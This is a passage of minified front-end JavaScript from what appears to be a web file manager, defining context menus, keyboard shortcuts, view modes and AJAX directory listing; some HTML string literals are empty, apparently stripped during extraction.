refresh",accesskey:"e"}}}),$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-tree-fav",callback:function(e){H(e)},items:{"fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"},"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"f"},sep2:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},E=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){H(e)},items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------",past:{name:LNG.past,className:"past",icon:"paste",accesskey:"p"},newfolder:{name:LNG.newfolder,className:"newfolder",icon:"folder-close-alt",accesskey:"n"},newfile:{name:LNG.newfile,className:"newfile",icon:"file-text-alt",accesskey:"j"},sep2:"--------",fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"}}})},j=function(){$('').appendTo("#rightMenu"),$('').appendTo("#rightMenu");var e={zIndex:9999,selector:".menu-tree-folder",callback:function(e){H(e)},items:{download:{name:LNG.download,className:"download",icon:"cloud-download",accesskey:"x"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy,className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute,className:"cute",icon:"cut",accesskey:"k"},past:{name:LNG.past,className:"past",icon:"paste",accesskey:"p"},rname:{name:LNG.rename,className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove,className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",newfolder:{name:LNG.newfolder,className:"newfolder",icon:"folder-close-alt",accesskey:"n"},search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},"open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe"},others:{name:LNG.more,icon:"ellipsis-horizontal",accesskey:"m",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep105:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep3:"--------",info:{name:LNG.info+'',className:"info",icon:"info",accesskey:"i"}}};$.contextMenu(e);var t={"fav-remove":{name:LNG.fav_remove,className:"fav-remove",icon:"trash",accesskey:"r"},"fav-page":{name:LNG.manage_fav,className:"fav-page",icon:"star",accesskey:"f"},sep0:"--------"};e.selector=".menu-tree-folder-fav",e.items=$.extend(t,e.items,!0),$.contextMenu(e)},z=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:o,callback:function(e){H(e)},items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},download:{name:LNG.download,className:"download",icon:"cloud-download",accesskey:"x"},refresh:{name:LNG.refresh_tree,className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------",copy:{name:LNG.copy,className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute,className:"cute",icon:"cut",accesskey:"k"},past:{name:LNG.past,className:"past",icon:"paste",accesskey:"p"},rname:{name:LNG.rename,className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove,className:"remove",icon:"trash",accesskey:"d"},sep2:"--------",newfolder:{name:LNG.newfolder,className:"newfolder",icon:"folder-close-alt",accesskey:"n"},"new-file-other":d["new-file-other"],search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},"open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe"},others:{name:LNG.more,icon:"ellipsis-horizontal",accesskey:"m",className:"more-action",items:{explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},sep106:"--------","create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"}}},sep3:"--------",info:{name:LNG.info+'Alt+I',className:"info",icon:"info",accesskey:"i"}}})},P=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:r,callback:function(e){H(e)},items:{refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"e"}}})},O=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:l,callback:function(e){H(e)},items:{fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}})},I=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:c,callback:function(e,t){var a=t.$trigger;a.hasClass("file")?D(e):H(e)},items:{fav:{name:LNG.add_to_fav,className:"fav",icon:"star",accesskey:"f"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}})},R=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,className:s.substr(1),selector:s,callback:function(e){H(e)},items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},download:{name:LNG.download,className:"download",icon:"cloud-download",accesskey:"x"},sep1:"--------",copy:{name:LNG.copy,className:"copy",icon:"copy",accesskey:"c"},cute:{name:LNG.cute,className:"cute",icon:"cut",accesskey:"k"},rname:{name:LNG.rename,className:"rname",icon:"pencil",accesskey:"r"},remove:{name:LNG.remove,className:"remove",icon:"trash",accesskey:"d"},sep2:"--------","open-browser":{name:LNG.open_ie,className:"open-browser",icon:"globe"},clone:{name:LNG.clone,className:"clone",icon:"external-link",accesskey:"l"},others:{name:LNG.more,icon:"ellipsis-horizontal",accesskey:"m",className:"more-action",items:{fav:{name:LNG.add_to_fav,className:"fav",icon:"star"},share:{name:LNG.share,className:"share",icon:"share-sign",accesskey:"e"},"create-link-home":{name:LNG.createLinkHome,className:"create-link-home",icon:"location-arrow",accesskey:"l"}}},sep3:"--------",info:{name:LNG.info+'Alt+I',className:"info",icon:"info",accesskey:"i"}}})},H=function(e){switch(e){case"open":ui.tree.open();break;case"refresh":ui.tree.refresh();break;case"copy":ui.tree.copy();break;case"cute":ui.tree.cute();break;case"past":ui.tree.past();break;case"clone":ui.tree.clone();break;case"rname":ui.tree.rname();break;case"remove":ui.tree.remove();break;case"info":ui.tree.info();break;case"cute-to":ui.tree.cuteTo();break;case"copy-to":ui.tree.copyTo();break;case"download":ui.tree.download();break;case"open-browser":ui.tree.openWindow();break;case"search":ui.tree.search();break;case"share":ui.tree.share();break;case"search":ui.tree.search();break;case"newfolder":ui.tree.create("folder");break;case"newfile":ui.tree.create("txt");break;case"newfile-html":ui.tree.create("html");break;case"newfile-php":ui.tree.create("php");break;case"newfile-js":ui.tree.create("js");break;case"newfile-css":ui.tree.create("css");break;case"newfile-oexe":ui.tree.create("oexe");break;case"explorer":ui.tree.explorer();break;case"open-project":ui.tree.openProject();break;case"fav-page":core.setting("fav");break;case"fav":ui.tree.fav();break;case"create-link-home":ui.tree.createLink(!1);break;case"fav-remove":ui.tree.favRemove();break;case"refresh-all":ui.tree.init();break;case"quit":break;default:}};return{initDesktop:u,initExplorer:p,initEditor:f}}),define("app/src/explorer/ui",["./fileContent"],function(e){var t=e("./fileContent"),a=t.f5,i=t.f5Callback,n=function(e){G.userConfig.listType=e,LocalData.set("listType",e),$(".set-icon-size").hide(),$(".tools-right button").removeClass("active"),$("[data-action=set-"+e+"]").addClass("active"),$("#list-type-header,.line-split-box").addClass("hidden"),$(".set-file-icon-size").hide(),$(Config.FileBoxSelector).removeClass("file-list-icon file-list-list file-list-split"),"list"==e?($(Config.FileBoxSelector).addClass("file-list-list"),$("#list-type-header").removeClass("hidden"),ui.fileListResize.bindHeaderResize()):"icon"==e?($(Config.FileBoxSelector).addClass("file-list-icon"),$(".set-icon-size").show(),$(".set-file-icon-size").show()):"split"==e&&($(Config.FileBoxSelector).addClass("file-list-split"),$(".line-split-box").removeClass("hidden")),$(".menu-set-icon").removeClass("selected"),$(".set-"+e).addClass("selected"),$(".file-continerMore").css("top",0);var t=$(".frame-right-main .tools").outerHeight();"list"==e&&(t+=26),$(".frame-header").is(":visible")&&(t+=$(".frame-header").outerHeight()),$(".bodymain").css("top",t)},o=function(e){n(e),a(!1,!1),void 0===G.sid&&$.get(G.appHost+"setting/set&k=listType&v="+e)},s=function(e,t){0!=e?(G.userConfig.listSortField=e,$(".menu-set-sort").removeClass("selected"),$(".set-sort-"+e).addClass("selected")):e=G.userConfig.listSortField,0!=t?(G.userConfig.listSortOrder=t,$(".menu-set-desc").removeClass("selected"),$(".set-sort-"+t).addClass("selected")):t=G.userConfig.listSortOrder,LocalData.set("listSortField",e),LocalData.set("listSortOrder",t),a(!1,!0),$.ajax({url:G.appHost+"setting/set&k=listSortField,listSortOrder&v="+e+","+t})},r=function(){$(".menu-recycle-button").bind("mouseenter",function(){$(this).addClass("recycle-hover")}).bind("mouseleave",function(){$(this).removeClass("recycle-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_RECYCLE)}),$(".menuShareButton").bind("mouseenter",function(){$(this).addClass("share-hover")}).bind("mouseleave",function(){$(this).removeClass("share-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_SHARE+":"+G.userID+"/")})},l=function(){$("#main-title div").die("click").live("click",function(){$(this).hasClass("resize")||("up"==$(this).attr("id")?$(this).attr("id","down"):$(this).attr("id","up"),s($(this).attr("field"),$(this).attr("id")))})},c=function(){$(".tools a,.tools button").bind("click",function(){var e=$(this).attr("data-action");m(e)})},d=function(){$(".dropdown-menu-theme li").click(function(){var e=$(this).attr("theme");ui.setTheme(e),$.ajax({url:G.appHost+"setting/set&k=theme&v="+e,dataType:"json",success:function(e){if(!e.code){var t=LNG.config_save_error_file;core.authCheck("setting.set")||(t=LNG.config_save_error_auth),Tips.tips(t,!1)}}})})},p=function(){$(".dialog-goto-path").bind("click",function(){var e=G.jsonData.info.adminRealPath;ui.path.list(e)}),$(".toolbar-path-more").die("click").live("click",function(){if($(this).hasClass("active"))return $(".menu-tool-path").trigger("contextmenu:hide"),$(this).removeClass("active"),void 0;$(this).addClass("active");var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$(".tool-path-newfile,.tool-path-upload").die("click").live("click",function(){var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$("body").bind("click",function(){$(".toolbar-path-more").removeClass("active"),$(".menu-tool-path").trigger("contextmenu:hide")})},u=function(){if("icon"!=G.userConfig.listType)return 1;var e=$(Config.FileBoxSelector).width(),t=$(Config.FileBoxClass).outerWidth()+$sizeInt($(Config.FileBoxClass).css("margin-right"));return parseInt(e/t)},f=function(){var e=u(),t=$(Config.BodyContent).outerHeight(),a=$(Config.FileBoxClass).outerHeight()+$sizeInt($(Config.FileBoxClass).css("margin-bottom"));return Math.ceil(t/a)*e},h=function(){var e=$(Config.FileBoxSelector).outerHeight()-48,t=$(Config.FileBoxClass).outerHeight()+10;return parseInt(e/t)},m=function(e){switch(e){case"recycle-clear":ui.path.recycleClear();break;case"refresh":ui.f5();break;case"newfolder":ui.path.newFolder();break;case"upload":core.upload();break;case"select-all":ui.fileSelect.selectPos("all");break;case"download":ui.path.download();break;case"set-icon":o("icon");break;case"set-list":o("list");break;case"set-split":o("split");break;default:}},v=function(){var e,t=0,a="",i=300;Mousetrap.bind(["1","2","3","4","5","6","7","8","9","0","`","~","!","@","#","$","%","^","&","*","(",")","-","_","=","+","[","{","]","}","|","/","?",".",">",",","<","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"],function(n){var o=String.fromCharCode(n.charCode);return 0==t?(t=timeFloat(),a=o,Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i),void 0):(i>timeFloat()-t&&(t=timeFloat(),a+=o,clearTimeout(e),Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i)),void 0)})},g=function(){v(),Mousetrap.bind(["f1","alt+left","backspace","alt+right","ctrl+backspace","command+backspace","ctrl+shift+r","f5","left","up","right","down","home","end","shift+left","shift+up","shift+right","shift+down","shift+home","shift+end","pageup","pagedown","ctrl+a","command+a","ctrl+shift+n","ctrl+shift+f","del","shift+del","f2","ctrl+enter","command+enter","shift+enter","space","enter","ctrl+u","command+u","ctrl+c","command+c","ctrl+x","command+x","ctrl+v","command+v","ctrl+f","command+f","f3","ctrl+i","alt+i","alt+n","alt+m","alt+enter","ctrl+s","command+s","alt+f4"],function(e,t){if($("body").hasClass("stop_hot_key"))return!0;if(ui.isEdit())return!0;if($.contextMenu.isDisplay())return!0;if($(".dialog-path-remove").length>0)return!0;var a=["ctrl+c","command+c","ctrl+v","command+v","ctrl+x","command+x"];switch(inArray(a,t)||stopPP(e),t){case"f1":core.setting("help");break;case"alt+left":case"backspace":ui.path.history.back();break;case"alt+right":case"ctrl+backspace":case"command+backspace":ui.path.history.next();break;case"ctrl+shift+r":case"f5":ui.f5(!0,!0);break;case"left":case"up":case"right":case"down":case"home":case"end":case"shift+left":case"shift+up":case"shift+right":case"shift+down":case"shift+home":case"pageup":case"pagedown":case"shift+end":ui.fileSelect.selectPos(t);break;case"ctrl+a":case"command+a":ui.fileSelect.selectPos("all");break;case"ctrl+shift+n":ui.path.newFolder();break;case"ctrl+shift+f":ui.path.newFile();break;case"del":ui.path.remove();break;case"shift+del":ui.path.remove(!1,!0);break;case"f2":case"ctrl+enter":case"command+enter":ui.path.rname();break;case"shift+enter":ui.path.download();break;case"space":ui.path.open();break;case"enter":ui.path.open();break;case"ctrl+u":case"command+u":core.upload();break;case"ctrl+e":case"ctrl+c":case"command+c":ui.path.copy();break;case"ctrl+x":case"command+x":ui.path.cute();break;case"ctrl+v":case"command+v":ui.path.past();break;case"f3":case"ctrl+f":case"command+f":ui.path.search($(".header-right input").val(),G.thisPath);break;case"alt+enter":case"ctrl+i":case"alt+i":ui.path.info();break;case"alt+n":ui.path.newFile();break;case"alt+m":ui.path.newFolder();break;case"ctrl+s":case"command+s":ShareData.frameTop("OpenopenEditor",function(e){e.Editor.save()});break;default:}})},b=function(){if(core.isApp("desktop")){var e=20,t=20,a=parseInt($(".file").css("height")),i=a-30,n=10,o=15,s=$(document).height()-80,r=Math.floor((s-e)/(a+n)),l=0,c=0,d=0,p=0,u=(s-e-r*(a+n)-n)/r;u>0&&(n+=u),$(".file-continer .file").css("position","absolute"),$(".file-continer .file").each(function(s){l=s%r,c=Math.floor(s/r),d=t+(i+o)*c,p=e+(a+n)*l,$(this).css({left:d,top:p})})}};return{f5:a,f5Callback:i,fileContent:t,initListType:n,setListSort:s,setListType:o,getRowfileNumber:u,getPagefileNumber:f,getColfileNumberDesktop:h,resetDesktopIcon:b,setTheme:function(e){G.userConfig.theme=e,core.setSkin(e),ShareData.frameTop("OpenopenEditor",function(t){t.Editor.setTheme(e)}),ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setThemeSelf(e)}),ShareData.frameTop("",function(t){t.ui.setTheme(e)}),$(".dropdown-menu-theme .list").removeClass("this"),$('.dropdown-menu-theme .list[theme="'+e+'"]').addClass("this")},setWall:function(e,t){$(".background").attr("src",e).one("load",function(){$(".full-background").css("background-image","url("+e+")"),"function"==typeof t&&t()})},setFileIconSize:function(e){ui.fileListResize.setFileIconSize(e,!0),core.isApp("desktop")&&ui.f5()},isEdit:function(){var e=$(document.activeElement).get(0);if(e)return e=e.tagName,"INPUT"==e||"TEXTAREA"==e?!0:$(".file.file-icon-edit").length>0?!0:!1},init:function(){if(G.sid){LocalData.get("theme")&&(G.userConfig.theme=LocalData.get("theme")),LocalData.get("listType")&&(G.userConfig.listType=LocalData.get("listType")),LocalData.get("listSortField")&&(G.userConfig.listSortField=LocalData.get("listSortField")),LocalData.get("listSortOrder")&&(G.userConfig.listSortOrder=LocalData.get("listSortOrder")),LocalData.set("theme",G.userConfig.theme),LocalData.set("listType",G.userConfig.listType),LocalData.set("listSortField",G.userConfig.listSortField),LocalData.set("listSortOrder",G.userConfig.listSortOrder);var e=window.location.href.split("#");2==e.length&&(G.thisPath=urlDecode(e[1]))}if(ui.setTheme(G.userConfig.theme),""==G.thisPath){var a=G.userID||G.sid,o=LocalData.get("thisPath:"+a);G.thisPath=o?o:G.myhome}n(G.userConfig.listType),t.init(),b(),ui.path.history.add(G.thisPath),i(function(){b()}),r(),l(),d(),c(),g(),p()}}}),define("app/src/explorer/fileContent",[],function(require,exports){var tpl=require("../../path/tpl/file/list.html"),pageLoadMax=200,ajaxLive=function(){ui.fileLight.init(),core.isApp("desktop")&&ui.resetDesktopIcon(),"split"==G.userConfig.listType&&ui.fileListResize.bindSplitResize(),lazyLoadImage(),iconFlex(),Hook.trigger("explorer.path.ajaxLive")},lazyLoadImage=function(){var e=$(".bodymain");"split"==G.userConfig.listType&&(e=$(".split-box").last().find(".content")),e.find(".lazyload-ready").lazyload({failure_limit:10,threshold:200,placeholder:G.staticPath+"images/common/loading_circle.gif",skip_invisible:!1,effect:"fadeIn",container:e,load:function(){$(this).removeClass("lazyload-ready")}}).on("error",function(){var e=$(this).data("errorReload");e?"1"==e&&($(this).parent().attr("filetype"),$(this).attr("src",G.staticPath+"images/file_icon/icon_file/picture_error.png"),$(this).data("errorReload","2")):($(this).attr("src",$(this).attr("src")+"#"+UUID()),$(this).data("errorReload","1"))})},iconFlex=function(){if(!core.isApp("desktop")&&"icon"==G.userConfig.listType){$(".file-list-icon .flex-empty").remove();for(var e="",t=0;30>t;t++)e+='
    ';$(e).appendTo(".file-list-icon")}},mainDataDefaultApps=function(){template.helper("fileIconMake",fileIconMake);var e=template.compile(tpl),t="";for(var a in desktopApps){var i={LNG:LNG,G:G,list:desktopApps[a],type:"icon-file"};t+=e(i)}return t},mainSetData=function(e){var t=makeHtml(G.jsonData,0,getPageNumber()-1);core.isApp("desktop")&&(t=mainDataDefaultApps()+t),t=htmlListAction(G.jsonData,t,!1),"split"==G.userConfig.listType&&(t='
    '+t+'
    '),e?$(Config.FileBoxSelector).hide().html(t).fadeIn(Config.AnimateTime).css("display",""):$(Config.FileBoxSelector).html(t),"split"==G.userConfig.listType&&$(".split-box").data("jsonData",G.jsonData),ajaxLive()},scrollDelayTimer="",bindScrollLoadMore=function(){var e=$(".bodymain");e.scroll(function(){clearTimeout(scrollDelayTimer),scrollDelayTimer=!1,scrollDelayTimer=setTimeout(function(){0!=e.scrollTop()&&loadMore()},100)}),$(".split-load-more").live("dblclick",function(){$("[data-action=set-list]").click() +})},getPageNumber=function(){var e=ui.fileLight.fileListAll().last(),t=$(".bodymain .file-continer-more");if(0==e.length)return pageLoadMax;var a=G.jsonData.folderList.length+G.jsonData.fileList.length;if(t.css("top",0),pageLoadMax>a||"split"==G.userConfig.listType)return pageLoadMax;var e=ui.fileLight.fileListAll().last(),i=e.outerWidth()+$sizeInt(e.css("margin-right"))+3.5,n=parseInt($(".file-continer").width()/i);"icon"!=G.userConfig.listType&&(n=1);var o=e.outerHeight()+$sizeInt(e.css("margin-bottom")),s=Math.ceil($(Config.BodyContent).height()/o),r=Math.ceil(a/n)*o;return t.css("top",r),s*n},resetTotalHeight=function(){var e=".bodymain .file-continer > .file",t=$(e).last(),a=$(".bodymain .file-continer-more");if(0!=t.length){var i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(a.css("top",0),!(pageLoadMax>i||"split"==G.userConfig.listType)){var n=t.outerWidth()+$sizeInt(t.css("margin-right")),o=parseInt($(".file-continer").width()/n);"icon"!=G.userConfig.listType&&(o=1);var s=t.outerHeight()+$sizeInt(t.css("margin-bottom"));Math.ceil($(Config.BodyContent).height()/s);var r=Math.ceil(i/o)*s;a.css("top",r)}}},loadMoreDelayTimer,loadMore=function(){var e=$(".bodymain .file-continer > .file"),t=e.last(),a=e.length-1,i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(!(a>=i-1||"split"==G.userConfig.listType)){var n=$(".bodymain").scrollTop(),o=$(".bodymain").height(),s=$(".bodymain").offset().top;$(".file-continer").offset().top;var r=t.outerHeight()+$sizeInt(t.css("margin-bottom")),l=s+o-r;if(l>t.offset().top){var c=l-t.offset().top,d=getPageNumber(),p=Math.ceil(c/o),u=p*d+a;u>i&&(u=i),u-a>1e3?($(".init-loading").show(),clearTimeout(loadMoreDelayTimer),loadMoreDelayTimer=setTimeout(function(){loadMoreSet(a+1,u),$(".bodymain").scrollTop(n)},300)):loadMoreSet(a+1,u)}}},loadMoreSet=function(e,t){var a=makeHtml(G.jsonData,e,t),i=$(a);i.appendTo(".file-continer"),ui.fileLight.fileListAll($(Config.FileBoxClass)),ui.fileLight.menuAction("clear"),lazyLoadImage(),iconFlex(),$(".init-loading").hide()},fileIconMake=function(e,t,a){var i="icon"!=t;if("folder"==e){var n=Hook.trigger("explorer.list.folderThumb",a.path,a.ext);return"string"==$.type(n)?n:(e=a.ext||e,core.icon(e,i))}var n=Hook.trigger("explorer.list.fileThumb",a.path,a.ext);if("string"==$.type(n))return n;if(inArray(["jpg","jpeg","png","bmp","gif","ico","svg","cur","webp"],a.ext)){var o=G.appHost+"explorer/image&path=";return G.sid&&(o=G.appHost+"share/image&user="+G.user+"&sid="+G.sid+"&path="),"
    "}if("app_link"==a.type){var s=core.icon("folder");0==a.content.search("ui.path.open")?s=core.icon(core.pathExt(a.name.replace(".oexe",""))):0==a.content.search("ui.path.list")&&(s=core.icon(a.icon));var r="
    "+s+"
    ";return r+""}if(a.icon&&"oexe"==a.ext){var l=a.icon;return"string"==$.type(a.icon)&&-1==a.icon.search(G.staticPath)&&"http"!=a.icon.substring(0,4)&&(l=G.staticPath+"images/file_icon/icon_app/"+a.icon),"
    "+core.iconSrc(l)+"
    "}return"
    "+core.icon(a.ext,i)+"
    "},makeHtml=function(e,t,a){template.helper("fileIconMake",fileIconMake);var i=template.compile(tpl),n="",o=[];o="up"==G.userConfig.listSortOrder?e.folderList.concat(e.fileList):e.fileList.concat(e.folderList),(!a||a>=o.length-1)&&(a=o.length-1);for(var s=t;a>=s;s++){var r="folder"==o[s].type?"-folder":"-file",l={LNG:LNG,G:G,list:o[s],index:s,type:G.userConfig.listType+r};n+=i(l)}return n},pathChildrenTree=function(e,t){if("string"==$.type(e))var a=$('.file[data-path="'+pathHashEncode(e)+'"]');else{var a=e;e=ui.fileLight.path(a)}if(1==a.length){var i=a.find(".children-more"),n=a.find(".children-more-cert"),o=$('.children-list[data-path-children="'+pathHashEncode(e)+'"]'),s=23;if(n.toggleClass("cert-open"),o.toggleClass("hidden"),o.hasClass("child-already-init"))return pathListOdd(),void 0;a.addClass("loading-children"),pathGet(e,function(e){a.removeClass("loading-children");var n=makeHtml(e,0,getPageNumber()-1);""!=n&&(n=htmlListAction(e,n,!0)),o.html(n),ajaxLive(),o.addClass("child-already-init");var r=s+parseInt(i.css("padding-left"));o.find(".file .children-more").css("padding-left",r),pathListOdd(),"function"==typeof t&&t(e)})}},htmlListAction=function(e,t,a){if(""==t)return t='
    '+LNG.path_null+"
    ";var i=e.folderList.concat(e.fileList);if(i.length>pageLoadMax){var n=core.pathFather(i[0].path);"list"==G.userConfig.listType&&a?t+='
    '+'
    '+''+'
    '+''+LNG.file_load_all+""+"
    "+"
    ":"split"==G.userConfig.listType&&(t+='
    '+'
    '+'
    '+''+LNG.file_load_all+"(to list)"+"
    "+"
    ")}return t},pathListOdd=function(){var e=0;ui.fileLight.fileListAll().each(function(){0==$(this).parents(".hidden").length&&(0==e%2?$(this).addClass("file2"):$(this).removeClass("file2"),e++)})},pathChildrenSplit=function(e,t){var a=$('.file[data-path="'+pathHashEncode(e)+'"]'),i=$(".file-list-split .split-box[data-path='"+pathHashEncode(e)+"']");if(0==a.length)return"function"==typeof t&&t(),void 0;if(1==i.length)return i.nextAll().remove(),"function"==typeof t&&t(),void 0;var n=a.parent().parent();pathSplitCreate(e,t,n)},pathSplitCreate=function(e,t,a){pathGet(e,function(i){if("notExists"==i.pathReadWrite)return t(i);var n=makeHtml(i,0,getPageNumber()-1);if(n=htmlListAction(i,n,!0),a)if(a.nextAll(".split-box").length>0){var o=a.next(".split-box");o.attr("data-path",pathHashEncode(e)).find(".content").html(n),o.nextAll().remove()}else n='
    '+n+'
    ',$(n).insertAfter(a).data("jsonData",i);else n='
    '+n+'
    ',$(n).appendTo(".file-list-split").data("jsonData",i);ajaxLive(),"function"==typeof t&&t()})},beforeSelectFileArr={},beforeListOpenArr={},beforeListOpen={},beforeListSplitSelect="",beforeScrollerLeft=0,f5Before=function(){if(!("icon"==G.userConfig.listType||beforeListOpenArr.length>0))if(beforeListOpenArr={},beforeListOpen={},"list"==G.userConfig.listType){var e=$(".child-already-init:visible");if(1>e.length)return;e.each(function(){var e=$(this),t=beforeListOpenArr,a=ui.fileLight.path(e,"data-path-children");beforeListOpen[a]=!1;for(var i=[a];0!=e.parents(".children-list").length;)e=e.parents(".children-list"),i.push(ui.fileLight.path(e,"data-path-children"));for(var n=i.length-1;n>=0;n--){var o=i[n];t[o]!==void 0?t=t[o]:t[o]={}}})}else if("split"==G.userConfig.listType){var t=beforeListOpenArr;beforeScrollerLeft=$(".drag-upload-box").scrollLeft(),beforeListSplitSelect=ui.fileLight.path($(".file-list-split .split-box.split-select")),$(".file-continer .split-box").each(function(){var e=ui.fileLight.path($(this));""!=e&&(t[e]={},t=t[e],beforeListOpen[e]=!1)})}},f5After=function(e){return"icon"==G.userConfig.listType||0==Object.keys(beforeListOpenArr).length?(f5AfterReloadFinished(e),void 0):("split"==G.userConfig.listType&&$(".file-list-split .split-box").remove(),f5AfterReload(beforeListOpenArr,e),void 0)},f5AfterReload=function(e,t){$.each(e,function(e,a){var i=pathChildrenTree;"split"==G.userConfig.listType&&(i=pathSplitCreate),i(e,function(){beforeListOpen[e]=!0,0!=Object.keys(a).length?f5AfterReload(a,t):f5AfterReloadFinished(t)})}),f5AfterReloadFinished(t)},f5AfterReloadFinished=function(e){for(var t in beforeListOpen)if(beforeListOpen[t]===!1)return;$(".drag-upload-box").scrollLeft(beforeScrollerLeft),ui.path.setSelectByFilename(beforeSelectFileArr),ui.fileSelect.selectSplit(beforeListSplitSelect),beforeListOpenArr={},beforeListOpen={},beforeSelectFileArr={},beforeListSplitSelect="","function"==typeof e&&e()},f5=function(e,t,a){if(void 0==e&&(e=!0),void 0==t&&(t=!1),jsonDataSortTitle(),f5Before(),beforeSelectFileArr=ui.fileLight.getAllName(),e?pathGet(G.thisPath,function(e){G.jsonData=e,mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a),core.isApp("desktop")?checkRecycle():ui.headerAddress.addressSet()},function(){$(Config.FileBoxSelector).html("")}):(G.jsonData=jsonDataSort(G.jsonData),mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a)),!core.isApp("desktop")){var i=G.userID||G.sid;LocalData.set("thisPath:"+i,G.thisPath)}},sortBy=function(e,t){var t="down"==t?-1:1;return function(a,i){var a=a[e],i=i[e];return pathTools.strSort(a,i)*t}},jsonDataSort=function(e){e=jsonDatafilter(e);var t=e.folderList,a=e.fileList;return t="size"==G.userConfig.listSortField||"ext"==G.userConfig.listSortField?t.sort(sortBy("name",G.userConfig.listSortOrder)):t.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),a=a.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),e.folderList=t,e.fileList=a,e},pathGet=function(e,t,a){var i=G.appHost+"explorer/pathList&path="+urlEncode(e);G.user&&(i=G.appHost+"share/pathList&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e)),$.ajax({url:i,dataType:"json",beforeSend:function(){$(".tools-left .msg").stop(!0,!0).fadeIn(200)},success:function(e){if($(".tools-left .msg").fadeOut(300),!e||!e.code)return Tips.tips(e),"function"==typeof a&&a(),!1;var i=jsonDataSort(e.data);"function"==typeof t&&t(i)},error:function(e,t,i){$(".tools-left .msg").fadeOut(300),core.ajaxError(e,t,i),"function"==typeof a&&a()}})},f5Callback=function(e){f5(!0,!1,e)},jsonDatafilter=function(e){if(!e)return e;if(void 0!=e.shareList&&(selfShare=e.shareList),e.filterSuccess===!0)return e;for(var t in e)if("fileList"==t||"folderList"==t)for(var a=0;e[t].length>a;a++){var i=e[t][a];if(i.mtime&&11>=(""+i.mtime).length)if(i.atime=date(LNG.time_type,i.atime),i.ctime=date(LNG.time_type,i.ctime),e.info&&e.info.pathType==G.KOD_USER_SHARE&&-1==trim(e.thisPath,"/").indexOf("/")){var n=parseInt(i.numView);n=isNaN(n)?0:n;var o=parseInt(i.numDownload);o=isNaN(o)?0:o;var s=date("Y/m/d ",i.mtime)+" ";s+=LNG.share_view_num+n+" "+LNG.share_download_num+o,i.mtime=s}else 